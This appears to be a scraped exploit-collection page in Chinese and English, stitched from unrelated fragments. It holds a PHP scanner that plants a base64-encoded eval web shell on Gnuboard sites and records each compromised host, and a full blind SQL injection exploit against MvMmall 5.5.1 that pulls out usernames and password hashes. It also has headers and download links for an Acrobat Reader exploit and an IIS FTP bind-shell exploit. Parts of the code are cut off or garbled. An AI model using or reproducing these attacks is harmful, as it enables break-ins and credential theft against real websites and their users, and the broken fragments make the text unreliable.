$a=preg_replace('(bbs\/board.php)','',$ok);

$file=$a."common.php?g4_path=/tmp%002345";
$xxx=$a."common.php?g4_path=data:;base64,PD9mcHV0cyhmb3BlbignLi9kYXRhL29rLnBocCcsJ3crJyksJzw/cGhwIEBldmFsKCRfUE9TVFtjXSk7ZWNobyAiZnVja3lvdSI7Pz4nKTs/Pg==";
$shell=$a."data/ok.php";
$target=parse_url($ok);
$sitepath=$target['host'];
$xx=@file_get_contents($file);
if(eregi("(Warning)",$xx)&&eregi("(tmp)",$xx))
{
print $sitepath." Vulnerability yes"."\r\n";
@file_get_contents($xxx);
$oksehll=@file_get_contents($shell);
if(!eregi("(\\02345)",$xx))
{
print $sitepath." %00 ok"."\r\n";
}

if (eregi("(fuckyou)",$oksehll))
{

print $shell." pass:c"."\r\n";
$axx="\r\n".$shell;
$sh=fopen('gnuboard.txt',"a+");
fwrite($sh,$axx);
fclose($sh);

}

}
else
{

print $sitepath." Vulnerability no"."\r\n";

}

}

?>

利用代码如下：

< ?php
ini_set("max_execution_time",0);
error_reporting(7);

if ($argc != 4)
usage ();
$hostname = $argv [1];
$path = $argv [2];
$userid = $argv [3];
$prefix = "mvm_";
//$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$pos = 1;
$chr = 0;

function usage ()
{
global $argv;
echo
"\n[+] MvMmall_V5.5.1 Blind SQL Injection Exploit".
"\n[+] Author: My5t3ry".
"\n[+] Site : http://hi.baidu.com/netstart".
"\n[+] Usage : php ".$argv[0]." ".
"\n[+] Ex. : php ".$argv[0]." localhost /shop 1".
"\n\n";
exit ();
}

function request ($hostname, $path, $query)
{
$fp = fsockopen ($hostname, 80);

if (!$fp) {
echo 'No response from '.$host; die;
}

$request = "GET {$path}/contrast.php?id={$query} HTTP/1.1\r\n".
"Host: {$hostname}\r\n".
"Connection: Close\r\n\r\n";

fputs ($fp, $request);

while (!feof ($fp))
$reply .= fgets ($fp, 1024);

fclose ($fp);
return $reply;
}

function lengthcolumns ($userid, $prefix)
{
global $path,$hostname;
$exit=0;
$length=0;
$i=0;
while ($exit==0)
{
$query = "-1) Or length((select member_id from ".$prefix."member_table Where uid={$userid}))=".$i."%23";

$query = str_replace (" ", "%20", $query);

$query = str_replace ("'", "%27", $query);

$reply = request ($hostname, $path, $query);

$i++;

preg_match ("/target=\"_blank\" title=\"(.+)\">

if ($i/>30) {die(" Exploit failed...");}

//echo $x [1];

if (strlen (trim ($x [1])) == 0)
$exit=0;
else
$exit=1;
}

$length=$i-1;

echo "[+]length -> ".$length;

return $length;
}

function exploit ($hostname, $path, $userid, $fld, $chr, $pos)
{
global $prefix;

$chr = ord ($chr);

$query = "-1) Or ASCII(SUBSTRING((SELECT {$fld} FROM ".$prefix."member_table WHERE uid={$userid}),{$pos},1))={$chr}%23";

$query = str_replace (" ", "%20", $query);

$query = str_replace ("'", "%27", $query);

$reply = request ($hostname, $path, $query);

preg_match ("/target=\"_blank\" title=\"(.+)\">

if (strlen (trim ($x [1])) == 0)
return false;
else
return true;
}

echo "\n-------------------------------------------------------------------------------\n\n";
echo " MvMmall_V5.5.1 Blind SQL Injection Exploit\n";
echo " By My5t3ry (http://hi.baidu.com/netstart)\n";
echo "\n-------------------------------------------------------------------------------\n\n";
echo "[~]Trying to get pre...\n";

$query = "-1))%23";

$reply = request ($hostname, $path, $query);

preg_match('/FROM `(.+)goods_table/ie',$reply,$match);

$prefix=$match[1];

if ($match[1]){echo "[+]Good Job!Wo Got The pre -/> ".$match[1]."\n";}else{die(" Exploit failed...");}

echo "[~]Trying to get username length...\n";

$length = lengthcolumns($userid, $prefix);

echo "\n[~]Trying to Crack...";
echo "\n[+]username -> ";

while ($pos < = $length)
{
$key = "abcdefghijklmnopqrstuvwxyz0123456789";

if (exploit ($hostname, $path, $userid, "member_id", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}

$pos = 9;

echo "\n[+]password(md5) -> ";

while ($pos < = 24)
{
$key = "abcdef0123456789";

if (exploit ($hostname, $path, $userid, "member_pass", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}

echo "\n[+]Done!";
echo "\n\n-------------------------------------------------------------------------------";
?>

绑定4444端口，Windows 2000 CN + SP4 测试通过，需要能建目录的用户，偏移地址若不通用，请自行修改。

阅读全文...

#!/usr/bin/env python
#
# *** Acrobat Reader - Collab getIcon universal exploiter ***
# evil_pdf.py, tested on Operating Systems:
# Windows XP SP3 English/French
# Windows 2003 SP2 English
# with Application versions:
# Adobe Reader 9.0.0/8.1.2 English/French
# Test methods:
# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7
# 24/06/2009 - Created by Ivan Rodriguez Almuina (kralor). All rights reserved.
# [Coromputer] raised from the ashes.
#

http://www.coromputer.net/CVE-2009-0927_package.zip

back: http://milw0rm.com/sploits/2009-CVE-2009-0927_package.zip

# milw0rm.com [2009-09-03]

#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444

# http://www.offensive-security.com/0day/msftp.pl.txt
阅读全文...